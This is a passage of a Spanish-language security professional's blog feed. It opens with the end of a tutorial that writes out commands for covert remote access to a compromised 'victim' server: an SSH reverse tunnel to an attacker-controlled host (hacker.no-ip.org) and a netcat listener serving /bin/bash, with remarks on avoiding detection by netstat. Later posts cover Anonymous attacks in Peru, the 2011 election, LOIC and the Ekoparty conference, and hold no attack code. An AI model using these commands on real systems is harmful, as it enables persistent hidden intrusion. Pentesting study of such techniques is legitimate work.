busque bien), asi que ahi va :<br /><br />1. Se debe haber conseguido alguna forma de ejecución en el servidor victima, por ejemplo, mediante un RFI, un webshell, etc., pero, que no permiten la flexibilidad de una línea de comandos de shell.<br /><br />2. En el server victima digitar algo como :<br />victima$ssh -p 31337 -f -N -R *:8081:localhost:8080 optimusprime@hacker.no-ip.org<br />Esto abre un socket en el puerto 8081 de hacker.no-ip.org<br />Al hacer un :<br />victima$ps agux | grep ssh<br />se podrá ver el proceso ejecutando, pero, aún algo como netstat no mostrará nada.<br />El objetivo es que al conectarse al puerto 8081 de hacker.no-ip.org, lo redireccionará hacia el 8080 de victima sobre el canal ya establecido.<br /><br />3. Correr un servicio en el puerto 8080 de la victima para que reciba la conexión reversa como por ejemplo<br />victima$ nc -l -v -n -p 8080 -e /bin/bash<br />listening on [any] 8080 ..<br /><br />4. En hacker.no-ip.org podremos ver el socket aperturado en 8081<br />hacker:~# netstat -nap<br />Active Internet connections (servers and established)<br />Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name<br />......................................................................................................................................<br />tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 12060/sshd: optimusprime<br /><br />5. Conectarse desde otro host al puerto 8081 de hacker.no-ip.org :<br />otro_host$nc -v hacker.no-ip.org 8081<br />Connection to hacker.no-ip.org 8081 port [tcp/tproxy] succeeded!<br />Aqui ya se pueden ejecutar comandos del shell, en este caso, tipo bash<br /><br />6. En la victima se aprecia la conexión, no se requiere una conexión de entrada, no se generan nuevos procesos y toda la comunicación es encriptada :<br />connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 47934<br /><br />Saludos!<br /><br />ADD : Verificar en /etc/ssh/sshd_config de hacker.no-ip.org, exista la linea :<br />GatewayPorts yesWCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-28731778410820301462011-06-23T22:47:00.003-05:002011-06-24T15:08:52.393-05:00Anonymous y PerúHoy día particularmente recibi varios llamados,correos, chats, etc. de consulta sobre la operación Andes Libres y la amenaza a Telefónica.<br /><br />Es bien curioso como la gente se pone atenta cuando estas cosas llegan a los medios de prensa y entonces quieren hacer lo que nunca hicieron : ponerse en posición de defensa.<br />Como le respondi a una persona, no hay nada nuevo atras de estos ataques, las tecnicas usadas son las mismas de hace años y las vulnerabilidades son las de siempre. Entonces, el mantener seguros los activos de información no debería ser una cuestión circunstancial sino una postura continua.<br /><br />Podría violar acuerdos de confidencialidad y divulgar todas las oportunidades en que contratados por entidades del gobierno para servicios de ethical hacking, hemos conseguido penetrar sus redes, pero, prefiero apuntar a quienes se erigen como representantes/miembros de Anonymous aca : <a href="http://www.piratasdelared.com/">http://www.piratasdelared.com/</a><br /><br />Ayer me tome un momento para comprobar como podían haber violado la seguridad de un Ministerio local y es increíble como existían por lo menos 6 puntos de ataque sencillos. Eso demuestra que no estan seguros y los sitios que han adicionado luego lo corroboran.<br /><br />Hoy veo que sale el Jefe de la ONGEI, Jaime Honores, a señalar que las entidades del gobierno se encuentran preparadas para el ataque. Este señor no solo demuestra ser un ignorante en esta materia sino que, ademas, demuestra como colocan personas sin capacidad para dirigir los destinos de la informática en el gobierno.<br />El seguramente cree que propiciar eventos de charlas y correrle herramientas automatizadas "con el apoyo de la empresa privada" es gestionar adecuadamente la seguridad de la información y seguridad informática. Claro, podrían decir que también existe un PeCERT, pero, saben que solo es un nombre y no es tangible.<br /><br />También vi un "blogger" que salia a decir que Anonymous carecia de orden y organización y que los ataques no iban contra la data, que vea el site de Piratas de la Red pues. Otro neofito.<br /><br />Para que servirá todo esto ? La verdad, servirá para que las entidades del gobierno compren mas hardware y software que ni saben que hace, pero, que si genera revenue para todos. También, contratarán consultorías con "empresas globales" y les pedirán que les hagan hackeos éticos, eso si : el personal debe ser ingeniero colegiado y tener certificaciones de seguridad de la información, no importa que no sepan ni un poco de hacking.<br />Resultado :falsa sensacion de seguridad, victimas voluntarias.<br /><br />Es importante que se sepa que estos temas no atañen solo a tecnológos mas o menos capaces sino a temas de legislación. El otro día un amigo me pregunta : cuantos C|EH que sean ingenieros colegiados conoces ? Mi respuesta fue CERO y su pregunta era reflexiva porque el sabe la respuesta. Entonces, por que se pide esto : porque el Reglamente de Contrataciones y Adquisiciones del Estado Peruano indica que para labores de ingeniería, el personal debe ser titulado y colegiado.<br />De cerca de 16 C|EH en Perú, ninguno es ingeniero colegiado.<br />Eso requiere un cambio para poder tener organizaciones que se evaluen correctamente por personal adecuado.<br /><br />En medio de todo esto hay actitudes hipócritas como las de los que se pelean por email y rajan de los demás, pero, en la foto siempre salen juntos y sonriendo. Y, también, hay actitudes valientes y honestas como la que vi hoy día de parte de un amigo (no diré su nombre por privacidad, pero, para darle una pista a el : MC) : rechazo participar en un proceso de contratacion de ethical hacking para una entidad del Estado porque analizó y determinó que el requerimiento estaba mal planteado y ello iba en contra de la calidad de servicio que merece una organización de nuestro país.<br /><br />Quisiera no opinar sobre cosas como estas y seguir unicamente con temas técnicos, pero, lamentablemente, el medio que nos rodea debe limpiarse de hipócritas y gente interesada unicamente en llenarse los bolsillos a partir del tema de seguridad de la información y seguridad informática.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com6tag:blogger.com,1999:blog-8620588.post-31329932631725582552011-06-06T23:52:00.001-05:002011-06-06T23:53:55.725-05:00Sobre la CAIDA de la Bolsa de Valores de Lima despues de la eleccion de Humala <meta name="qrichtext" content="1"><meta equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css"> p, li { white-space: pre-wrap; } </style> <p style="margin: 0px; text-indent: 0px;"><!--StartFragment-->"La Bolsa de Valores de Lima es "asisito" respecto al valor de la produccion del Perú. Que se mueva esto fuerte no le hace mella al sector real de la produccion y el empleo en el Perú que es lo que le preocupa a la agente y en segundo lugar, los que participan en la bolsa, pero, no llegan ni al 0,1% de la poblacion peruana. De tal manera que al caer la bolsa afecta a una completa minoria. De tal manera que creo yo que tampoco hay que sobredimensionar esto, no? Hay que darle su importancia, si, porque afecta expectativas futuras, pero, tambien hay que decirle a la gente que a diferencia de otros paises desarrollados, aca que la bolsa caiga, su impacto, en lo que le preocupa a la gente que es su trabajo, su sueldo, su ingreso, la produccion...en el corto plazo, es casi, que no se siente." Jorge Gonzales Izquierdo, Economista. Fuente : 24 Horas, 6 de Junio del 2011. Panamericana Television.<!--EndFragment--></p>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-19512604465702492042011-06-03T13:25:00.003-05:002011-06-03T14:24:05.905-05:00Primer post del 2011 ? Elecciones 2011 Segunda Vuelta - Ollanta y KeikoLa verdad, me dedique mas a postear en el blog de Open-Sec aunque igual ha sido casi nada.<br />Me sobran temas tecnicos porque como siempre pienso : cuando alguien tecnico con blog deja de postear es porque anda con trabajo y eso me ha pasado.<br />Sin embargo, no puedo evitar usar este medio para manifestar mi opinion de este proceso electoral.<br /><br />Debo iniciar parafraseando algo escuchado ultimamente : Toledo dijo que votar por Ollanta era un salto al vacio, creo que votar por Keiko es lanzarse de una de las torres del Centro Civico hacia el concreto.<br /><br />Particularmente, mi ideologia politica siempre ha sido de corte socialista y, por ello, el hecho que Ollanta y Keiko sean los que pasen a la segunda vuelta ya es un triunfo ya que el Perú es más que Lima y mas que mi situacion economica-social-politica en particular. Es decir, elegir no pensando solo en "este me conviene y este no me conviene".<br /><br />En los ultimos dos dias Ollanta ha sido acusado de todo lo que se pueda : sobornos para que salga librado de los juicios que tenia, pago de narcos en su epoca de militar, recibir dinero de Chavez y todo culminara el domingo con los tradicionales insultos a su esposa cuando vaya a votar.<br />Todo sin pruebas, claro, solamente la afirmacion de personas interesadas o de dudosa calaña.<br />Keiko dice que hay pruebas de sobornos para salir librado de juicios, donde estan las pruebas ?<br />Un tipo de mala calaña envio por dias a dos ancianos a la carcel con tan solo una declaracion y luego se demostro que mintio. Todo se dieron golpes de pecho. Ah! Pero, si un narco acusa a Ollanta, hay que creerle.<br />Un politico de US lo acusa de recibir dinero de Chavez y todos se olvidan de los Wikileaks que demostraron como los politicos en US se meten en las decisiones de otros paises. Es mas, demostraron como politicos locales acudieron al gobierno de US a pedir que impidan que gane Ollanta en el 2006 y, por ello, tuvimos la desgracia de tener un presidente como Alan Garcia.<br /><br />Que tenemos por el lado de Keiko ?<br />Tiene una buena formacion academica fruto de la inversion hecha por nosotros los peruanos en sus estudios.<br />Uso el melodrama en el ultimo debate para decirnos que quiere hacer las cosas en forma diferente a su padre porque ella es madre. Detesto cuando las mujeres toman su genero para escudarse en el y , pero, aun cuando hacen uso de su condicion de madres y mas lamentable es que mencione a sus hijas para convencer a los votantes.<br />Se ha unido a PPK que dijo renuncio a su nacionalidad norteamericana y, en realidad, aun no hay pruebas que el tramite se haya completado. Imagino que al haber perdido estripitosamente en la primera vuelta, pidio que anulen el proceso ya que como ha dicho, sus principales ingresos vienen de US.<br />San Roman se une a Keiko, no importa que le patearon el trasero durante el gobierno de su padre.<br />Castañeda hizo la mayor publicidad de pocas obras publicas en toda la historia de Lima y los que circulamos por varios lugares de Lima, vemos que hizo muchisimo menos de lo dice.<br />Los demas, son relleno, pero, como sea, lo que demuestra es que Keiko se conviritio en la candidata de los perdedores de la primera vuelta. Es decir, lo que voten por ella, estaran votando por PPK y Castañeda. Votaran por los que no quieren que este pais cambie.<br />Ni siquiera le doy mucho al asunto de las torturas a su madre y la esterilizacion no voluntaria de miles de mujeres ante lo cual ella solo se quedo callada porque si reclamo, lo hizo en secreto.<br /><br />Ollanta ha tenido el apoyo de muchos politicos y personalidades, pero, creo que no es lo mas relevante en este momento. Tal vez, rescataria el apoyo de Accion Popular, partido que nos dio a dos de los mejores presidentes de nuestro pais : Fernando Belaunde Terry y Valentin Paniagua.<br /><br />Sin embargo, me da risa cuando los jovenes entusiastas, inexpertos y desinformados se sorprenden por estas alianzas. Por suerte, mi edad me ayuda a recordar historia pasada como cuando el APRA hizo coalicion con la Union Nacional Odriista en su afan por el poder.<br /><br />Para alguien que vivio concientemente desde el gobierno de Velazco, como yo, es facil calificar al gobierno de Alberto Fujimori como el mejor y, principalmente, porque su labor permitio dar estabilidad economica al pais y retomar la seguridad ante el terrorismo (que ha vuelto a arreciar con el desastre de gobierno de Garcia desde el 2006). Por mi lado, la llegada de la tecnologia a Perú es lo que permitio nuestro actual avance.<br />En suma, se le debe mucho a Fujimori, si, ALBERTO FUJIMOR, pero, Keiko no es Alberto y no puede ser tan sirvenguenza de mostrar orgullo por el gobierno de su padre (como si ella hubiese hecho algo en ese momento como no sea estudiar en US) y, luego, deslindar su rol complaciente de "primer dama".<br />Todos sabemos que los votos que obtuvo en la primera vuelta no fueron por ella, mucha gente desinformada creia que votaba por Alberto Fujimori y otros por la esperanza que lo indulte.<br /><br />Yo estoy seguro que si gana Keiko, como todo parece indicar, nada cambiara en el pais. Nada cambiara para los que deberia cambiar, para aquellos que mueren de frio en Puno, para aquellos que para ir al colegio deben cruzar el rio en un "deslizador" con sogas, para aquellos que mueren por desnutricion, para aquellos que no saben leer ni escribir, para aquellos que sufren la contaminacion dejada por las mineras, para aquellos que no tienen servicios de salud.<br />Claro, tampoco cambiara radicalmente para los "dueños" de este pais, solamente, seran mas poderosos.<br /><br />Al final, si hago el analisis egoista, no me importa cual gane porque me tocara seguir trabajando como siempre, pero, como dije, el Perú es mucho mas grande que Lima.<br /><br />Debo tambien analizar las propuestas. Creo que el principal error del plan de gobierno de Gana Perú fue ser una mixtura de plan de gobierno con ensayo politico. Pero, tambien creo que en nuestro pais se rehuye a ser directo, vivimos de la hipocresia constante. Nunca se dicen las cosas en la cara, se dicen a espaldas de las personas.<br />Sin embargo, a diferencia de lo que dijo Garcia, el territorio peruano es de los peruanos y nosotros determinamos que se hace aca o no. Osea, soy peruano para pagarle los impuestos a SUNAT, pero, no para pedir que sigan dañando nuestro territorio las mineras ?! Claro, como ningun twittero se traga el mercurio...<br />A ver, que vaya Garcia a decirle a los "propietarios" de Asia que ese pedazo de litoral peruano no es suyo...que vaya pues!<br />La inversion extranjera es importantisima, pero, que sea buena para todos. No se trata de inversion y nuevos empleos mal pagados. Que no inviertan aca porque se les deja hacer lo que les de la gana o porque la mano de obra es mas barata sino porque sera buena mano de obra.<br />Necesitamos ordenar el pais empezando por sus autoridades. El asunto de policias corruptos es tan malo como el de congresistas corruptos y ociosos : no se resuelve con subir sueldos sino con educacion con valores y controles efectivos.<br />La educacion no mejora solamente creando examenes para botar gente y remodelando los "colegios emblematicos" y la mejor prueba son todas las peleas callejeras con armas blancas que se han producido desde hace semanas en conocidos colegios limeños. Eso solo se resolveria con los profesores y autoridades educativas adecuadas.<br /><br />Ante esta estupidez colectiva, lo positivo es que han surgido enfretamientos directos : los jovenes dicen lo que piensan y ellos son los que cambiaran este pais, pero, por favor informense. No sigan a lideres solo porque son "nice" o "cool" sino porque analizaron sus planteamientos e ideologia.<br />Un vocero de Keiko dijo que se necesitaba un gobierno pragmatico y no ideologico y me dio risa porque sono a "Keiko nos sirve porque no tiene ideas".<br /><br />El tema es interminable y ya me toca seguir trabajando y ver a mi familia.<br /><br />Ah! Me olvidaba, el Perú tambien es mas grande e importante que el presidente que tenga. Aun me afano porque las instituciones de mi pais obtengan buenos servicios de hacking asi no los haga mi equipo y, como varios de ellos pueden dar fe, lo hago aun asi no gane un centavo.<br />En otro aspecto, con mi esposa todos los dias inculcamos valores a nuestros hijos para que nuestro pais sea mejor.<br /><br />Por esas razones, no importa si es Garcia el presidente o es Keiko u Ollanta, debemos apoyar las buenas acciones, controlar siempre y openernos a lo incorrecto MAS ALLA DE NUESTROS PROPIOS INTERESES.<br /><br />Hasta la proxima que promete sera algo 100% tecnico, probablemente sobre lo ultimo novedoso que he venido haciendo que es hackeo de smartphones.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-80296437771388857712010-12-31T21:17:00.003-05:002010-12-31T22:11:55.747-05:00Ultimo post del 2010Siempre he escuchado gente que pide que el año actual se "vaya" rapido porque les resulto muy malo y esperan que el proximo sea mejor. Yo siempre esperaba que el proximo sea mejor, pero, consideraba que el presente ya habia terminado y nada mas.<br />Esta vez es diferente, me auno a los que esperan que se VAYA pronto el 2010, fue un año de extremos, mas extremos que los polos norte y sur.<br /><br />Esto sera un analisis rapido, son 9:26 pm en Lima, Perú...<br /><br />Tecnicamente, el año fue de lo mejor porque tanto a nivel de equipo como individualmente quede convencido que hay buenas capacidades. Esto suena BIEN "panudo", pero, tuvimos oportunidad de compararnos con colegas en eventos diversos; conocer de las vulnerabilidades mas recientes y entenderlas, pero, mas aun, explicarselas a los demas en charlas y clases; encontrar vulnerabilidad en los servicios de los clientes que otros no encontraron (incluso hubo un caso donde una vulnerabilidad fue divulgada hasta con videos por un "iluminado" y no tenia ni idea hasta donde se podia llegar); modificamos y hackeamos mas toolz que antes (incluso MVelazco desarrollo una nueva y personalmente encontre como pasar por alto las restricciones de una tool de analisis de vulnerabilidad que se esta haciendo mas popular); entrenamos mas de 100 personas en ethical hacking; participamos exitosamente en algunos CtF; en fin, solo puedo pensar en exitos tecnicos.<br />En el otro extremo y bien relacionado a esto, no consegui que alguien maneje los proyectos en mi lugar y, muy a mi pesar, sigo siendo la cara visible de Open-Sec. Asi no importa que seamos la unica organizacion peruana que tiene 4 hackers de staff y que todos estemos certificados por EC Council y algunos por Offensive Security, GIAC, ISC2, etc. Si los demas no los conocen ni saben de sus certificaciones, es lo mismo que nada.<br /><br />El desarrollo de la empresa lo resumo en : menos dinero que el año 2009, pero, mejores clientes y de mas renombre.<br />Una persona me dijo algo : "Lo que la gente ve en Uds. es que son estables a traves de los años". Y es que es bien raro encontrar organizacion que vivan haciendo servicios unicamente y no vendiendo productos y, peor/mejor aun, servicios de ethical hacking.<br />Pero, se ve que es de extremos ? Poca plata y mejores clientes.<br />Este año me toco terminar la iniciativa de Ecuador y, sin embargo, llegamos hasta Honduras.<br />Perú es un medio dificil para hacer negocios de seguridad porque, LAMENTABLEMENTE, aun existen clientes que evaluan subjetivamente basados en cosas el origen extranjero de las empresas, si haces eventos grandes, si les regalan cursos, etc.<br /><br />En lo familiar, fue lo mismo : pase por la peor de las situaciones en mi vida y al mismo tiempo tengo la mejor familia que alguien pueda desear.<br />Considero que cada cosa mala da lugar a algo bueno. El problema que afronte me permitio encontrar amigos muy buenos y que incluso me acompañaron en la decision que tome, asi no sea necesariamente lo que ellos harian.<br /><br />Dado que me propuse no postear cosas personales en este blog, no colocare nombres ni mas detalles y solamente algunas cosas que me vienen a la mente como premisas para el proximo año :<br /><ul><li>Decir la verdad siempre de frente A LA PRIMERA. Mi norma es decir siempre la verdad, pero, muchas veces trato de postergarlo por no aparecer como rebelde o conflictivo. Eso me ha traido incluso reclamos en los ultimos 2 dias por no decir a alguien que solamente queria ayudarlo aunque en realidad no lo necesitaba.</li><li>Difundir mas los exitos de los peruanos en cuanto foro se pueda dar.</li><li>Dedicar mas tiempo a mejorar mi estado de salud.</li><li>Obtener al menos una certificacion de hacking adicional (este año priorize la inversion en las certificaciones de otros, el 2011 es mio!).</li><li>No participar en eventos donde no haya etica y eso implica no aceptar como sponsors a empresas de dudosa etica.</li></ul>Finalmente, solo quiero desearle un año 2011 MUY BUENO a cualquiera que lea este post, se amigo, enemigo o lo que sea.<br /><br />FELIZ 2011 !!!!WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-66318857687495187842010-12-18T00:36:00.003-05:002010-12-18T01:06:24.705-05:00Mea culpa y entrevista en lamula.peEl jueves participe de LimaHack 2010 y en algun momento de aquellos donde no pude con mi genio, mencione como Operation Payback demostro que para hacer ataques no todo es tema de toolz y que mover a las masas es mejor estrategia.<br />Incluso, mencione el hecho que en algunos casos no habia que descargar nada sino entrar con el browser, seleccionar el objetivo (de acuerdo a lo que ordenara Anonymous) y listo. Dije tambien que alli habia un buen "chunk" de hexa que era un javascript en base64 (creo que no di tanto detalle) y mencione que eso podia ser cualquier cosa.<br />Entonces, el MEA CULPA : olvide que yo mismo, dias atras, habia compartido con algunos el hecho que este ataque de DDoS usaba LOIC (tambien se usaron otros similares como HOIC aunque no es tan elaborado y no se encuentran los fuentes a pesar que se anuncia con abierto).<br />Este LOIC es una tool y por eso el MEA CULPA porque SI hay una TOOL de por medio. En realidad, trate de rescatar el hecho que esta tool permite generar un DDOS con colaboracion voluntaria motivada por la convocatoria por redes sociales (twitter en particular).<br />Incluso, LOIC tiene un "modo" hivemind que permite entregar la maquina propia a un bot controlado via IRC (al mejor estilo del fenecido proyecto SETI).<br /><br />Aprovecho este mismo post para comentar sobre una entrevista que nos hizo lamula.pe durante LimaHack 2010 : <a href="http://lamula.pe/2010/12/17/hackers-peruanos-wikileaks-julian-assange-lamer-insurance/4042">http://lamula.pe/2010/12/17/hackers-peruanos-wikileaks-julian-assange-lamer-insurance/4042</a><br />Hace tiempo que no mencionaba el termino lammer porque ultimamente prefiero llamarlos "iluminados", pero, lo cierto es que me gusto el espacio para desmitificar un poco el asunto.<br />Por ahi lei un comentario que decia que un hacker no se autocalifica segun Eric Raymond y su definicion de hacker como alguein que investiga profusamente algo y comparte ese conocimiento. Yo mismo durante varios años explique el concepto junto con el glider y decia que un cheff tambien puede ser un hacker en su terreno.<br />Ja! Pero, hay muchas cosas que no ayudan a explicarse por ser purista y exacto, asi que hacker es un termino referido a hackers de tecnologia, para todo lo demas que vuele la imaginacion.<br />En lo que si me voy a mantener siempre es que un hacker no debe autocalificarse. Yo soy un hacker etico certificado y lo digo porque tengo la certificacion de C|EH que la emite un tercero (EC Council), pero, tambien soy un Evaluador de Penetraciones Certificado (Certified Penetration Tester suena menos erotico) por GIAC/SANS y es mas o menos lo mismo.<br />Si no tuviese esas certificaciones diria que soy un hacker ? Seguro que no al igual que siempre aclaro el hecho que no soy ingeniero sino tecnico, asi que, no es un tema de dogmas sino de sinceridad y honestidad con uno mismo.<br />Claro, si alguien me pregunta si me gusta hackear yo respondere que es lo maximo despues de mi familia. Sexo y musica quedan en la cola al paso de los años.WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-91198419379511812932010-11-22T23:31:00.002-05:002010-11-23T00:09:23.116-05:00Tiempos movidos...mucho de todoY esa siempre es la razón por la cual es más dificil bloggear en los últmos tiempos, son tiempos movidos donde se hace mucho y de todo.<br /><br />Las vulnerabilidades siempre parecen ser más de lo mismo y a veces llego a pensar que mi percepción sobre el negocio de los virus y antivirus se da también en las vulnerabilidades. Es dificil aceptar que sigan dandose tantos descuidos en aplicaciones comerciales que tienen grandes inversiones en el desarrollo de software.<br /><br />Pero, por otro lado, también parece increíble que aún existan aplicaciones hechas a medida que sean tan vulnerables a SQLi, XSS, etc. o que sigan metiendo tanta información en variables de sesión o que consideren que los atacantes nunca querrán vulnerar sus aplicaciones.<br /><br />Aún en países como el nuestro, el hacker es un ser casi extraterrestre y no se llega a crecer en la misma cantidad de especialistas en hacking que se tiene en otros países. Esto podría paracer bueno para alguien que vive de eso dado que no hay mucha competencia, pero, no es así porque como siempre (pueden ver mis otros posts), el cliente no sabe lo que hay y encima hay mucho charlatan, local y foraneo.<br /><br />Más allá de todo esto, no hay otra cosa como andar todo el tiempo investigando, analizando lo que pasa con el software, el hardware y la seguridad como un todo. Sí alguien tiene sed de conocimiento, entonces debe practicar el hacking, la medicina y/o la cocina. En todos ellos hay creatividad constante, investigaciones a raudales y una sed de conocimiento satisfecha al vencer retos.<br /><br />En los últimos meses he visto como personas de Ecuador, Honduras y Perú aprenden técnicas de hacking teoricamente, luego hacen algunas pruebas y cuando son sometidos a retos del mudno real es que realmente empiezan a disfrutarlo. En lo personal, quisiera ver más expertos en hacking en Perú, sean de Open-Sec o no, pero, que se dediquen y que sean responsables por lo que hacen. Que no sean ejecutores de herramientas ni consultores de alto nivel, sino gente que investigue a fondo, que asuma retos y que entregue una buena calidad en cada cosa que ejecute.<br /><br />Tecnicamente puedo decir que, para varias, los últimos meses han sido de dedicación casi total a MetaSploit con algunas paseadas por NeXpose/Sapyto(bizploit) y una búsqueda constante de una herramienta automatizada para analizar webs que de veras la haga, pero, hasta ahora, la mejor herramienta sigue siendo la revisión "a mano" del los web (claro, usando los queridos NoScript, Agent Switcher, Poster, Tamper Data, Grounspeed, Firebug y Hackbar).<br /><br />No puedo dejar de comentar en esta especie de catarsis bloggera que estoy haciendo después de mucho tiempo, la noticia del día : Novell fue adquirido por Attachmate. Sabía que hacian emuladores de terminal y nada más. Creo que es la mejor forma de terminar para Novell en las manos de un pequeño desconocido que descuartizado por un gigante aunque el holding que esta detrás de Attachmate es liderado por Microsoft y ya sabemos de donde salió el dinero para esa compra.<br />Novell se constituyó en una parte muy importante de mi vida, pero, movimientos absurdos como comprar CTP y dejar que sus "ejecutivos" asuman el control de una corporación de tecnología hizo que entre otras cosas despidan a Eric Schmidt, creador del proyecto de Java en Sun y hoy día CEO de Google.<br /><br />Hasta la proxima!WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-2933493937423685022010-10-02T22:18:00.004-05:002010-10-03T01:06:13.745-05:00Ekoparty 2010<div style="text-align: justify;"><span style="font-family:trebuchet ms;">Esta fue una de las aventuras más simpáticas de los úl</span><span style="font-family:trebuchet ms;">timos tiempos. Ya el año pasado nos quedamos sin ir por la carga laboral y este año nos lanzamos.</span><br /><span style="font-family:trebuchet ms;">Era importante para n</span><span style="font-family:trebuchet ms;">osotros ir como team y para ver que tal estamos comparados con un medio tan avanzado y competitivo como el argentino, en otras palabras, que tan "hackers" somos y </span><span style="font-family:trebuchet ms;">de hech</span><span style="font-family:trebuchet ms;">o, el resultado fue positivo para nosotros, pero, hay que </span><span style="font-family:trebuchet ms;">tener en cuenta que en Argentina no solamente hay bueno</span><span style="font-family:trebuchet ms;">s pen testers, ethical hackers, etc. sino</span><span style="font-family:trebuchet ms;"> excelentes investigadores y desarrolladores en seguridad informá</span><span style="font-family:trebuchet ms;">tica. Mauricio Velazco se preguntaba : y ellos estan todo el día investi</span><span style="font-family:trebuchet ms;">gando para encontrar esas vulnerabilidades y desarr</span><span style="font-family:trebuchet ms;">ollar exploits ? La respuesta es SI porque allá hay empresas que se dedican a desarrollar herramientas de hacking, tanto como software libre </span><span style="font-family:trebuchet ms;">como comercial. Eje</span><span style="font-family:trebuchet ms;">mplo de todo ello son Core Impact (de Core Security), CANVAS (de Immunity) y la incorporación de w3af al "conglomerado" de Rapid7 que ya cuenta con MetaSploit, así como, Netifera y el ataque de Padding Oracle aplicado a la _</span><span style="font-family:trebuchet ms;">_viewstate de .Net donde el 50% del mérito lo tiene un argentino, J</span><span style="font-family:trebuchet ms;">uliano Rizzo.</span><br /><span style="font-family:trebuchet ms;">Aca nuestra investigación se da en forma </span><span style="font-family:trebuchet ms;">posterior porque n</span><span style="font-family:trebuchet ms;">os dedicamos a entender las vulnerabilidades reportadas</span><span style="font-family:trebuchet ms;"> y luego, a comprender como funcionan las herramientas o exploits lanzados, y, en algunos casos, para corregirlos o adecuarlos a nuestras necesidades (aunque ya tenemos 3 nu</span><span style="font-family:trebuchet ms;">evas herramientas que lanzaremos este mes en el evento de ISACA el 22 de octubre).</span><br /><span style="font-family:trebuchet ms;">A continuación la aventura Ekoparty en imágenes </span><span style="font-family:trebuchet ms;">:</span><br /><a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKf86XaEoZI/AAAAAAAAAQg/IJsMS-lNSX4/s1600/PICT0027.JPG"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKf86XaEoZI/AAAAAAAAAQg/IJsMS-lNSX4/s200/PICT0027.JPG" alt="" id="BLOGGER_PHOTO_ID_5523661547639185810" border="0" /></a><span style="font-family:trebuchet ms;">Perú estuve super presente en Ekoparty 2010.</span><br /><span style="font-family:trebuchet ms;">Estuvimos 4 de O</span><span style="font-family:trebuchet ms;">pen-Sec, Juan Pablo, Felipe y Miguel (más datos omitidos a propósito).</span><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_5Ut8jEtbEaU/TKgU5blAeZI/AAAAAAAAAQo/0Ne7qdglt3Q/s1600/PICT0028.JPG"><img style="float: right; margin: 0pt 0pt 10px 10px; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_5Ut8jEtbEaU/TKgU5blAeZI/AAAAAAAAAQo/0Ne7qdglt3Q/s200/PICT0028.JPG" alt="" id="BLOGGER_PHOTO_ID_5523687919857990034" border="0" /></a><br /><span style="font-family:trebuchet ms;">La danza diabólica de las habitaci</span><span style="font-family:trebuchet ms;">ones comp</span><span style="font-family:trebuchet ms;">artidas.</span><br /><span style="font-family:trebuchet ms;">Quién duerme con MV ? Por aca! Pero, luego encontró su pareja ideal : MU, durmieron juntos 3 noches y fueron felices por siempre. MV se quedó unos días </span><span style="font-family:trebuchet ms;">más en Bs Aires hacien</span><span style="font-family:trebuchet ms;">do los trámites del matrimonio.</span><br /><span style="font-family:trebuchet ms;">(El del gesto diabólico no es ninguno de los M*).</span><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgWcD1yCyI/AAAAAAAAAQ4/Q3QnEzKpQgQ/s1600/PICT0035.JPG"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgWcD1yCyI/AAAAAAAAAQ4/Q3QnEzKpQgQ/s200/PICT0035.JPG" alt="" id="BLOGGER_PHOTO_ID_5523689614292945698" border="0" /></a><br /><span style="font-family:trebuchet ms;">Nos mand</span><span style="font-family:trebuchet ms;">aron un mail diciendo que lleguemos a las 7:30 am., como buenos peruanos puntuales, llegamos a las 9:00 de la madrugada y quedó claro que argentinos y peruanos somos hermanos, más puntuales imposible!</span><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgXHqZo4ZI/AAAAAAAAARA/Cj2IHFegAMY/s1600/PICT0048.JPG"><img style="float: right; margin: 0pt 0pt 10px 10px; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgXHqZo4ZI/AAAAAAAAARA/Cj2IHFegAMY/s200/PICT0048.JPG" alt="" id="BLOGGER_PHOTO_ID_5523690363378262418" border="0" /></a><br /><span style="font-family:trebuchet ms;">El escenario de Eko</span><span style="font-family:trebuchet ms;">party. El lugar donde se realiza es bien particular, hay que tener la mente bien abierta para encontrarle lo simpático, pero, el escenario como tal es buenísimo : un logo de Ekoparty en neón, un panel suficientemente grande, buen audio, una decoración e</span><span style="font-family:trebuchet ms;">ntretenida, muy bueno.</span><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgX73OZ_uI/AAAAAAAAARI/kF0GFMq9Wx0/s1600/PICT0053.JPG"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgX73OZ_uI/AAAAAAAAARI/kF0GFMq9Wx0/s200/PICT0053.JPG" alt="" id="BLOGGER_PHOTO_ID_5523691260174008034" border="0" /></a><br /><a onblur="try 